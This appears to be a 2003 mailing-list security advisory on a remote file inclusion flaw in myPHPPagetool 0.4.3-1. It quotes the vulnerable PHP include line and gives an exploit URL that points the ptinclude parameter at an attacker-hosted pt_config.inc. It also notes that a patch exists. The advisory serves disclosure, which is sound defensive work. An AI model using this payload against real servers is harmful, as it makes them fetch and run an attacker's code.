Informations : °°°°°°°°°°°°°° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9.php : ---------------------------------------- <?php include ($ptinclude . "/pt_config.inc"); [...] ---------------------------------------- Exploit : °°°°°°°°° http://[target]/doc/admin/index.php?ptinclude=http://[attacker] with : http://[attacker]/pt_config.inc (if registers_global=ON) Solution : °°°°°°°°°° A patch has been published on http://www.phpsecure.info . More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/myphpPagetool.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
This archive was generated by hypermail 2b30 : Sun Feb 02 2003 - 17:02:51 PST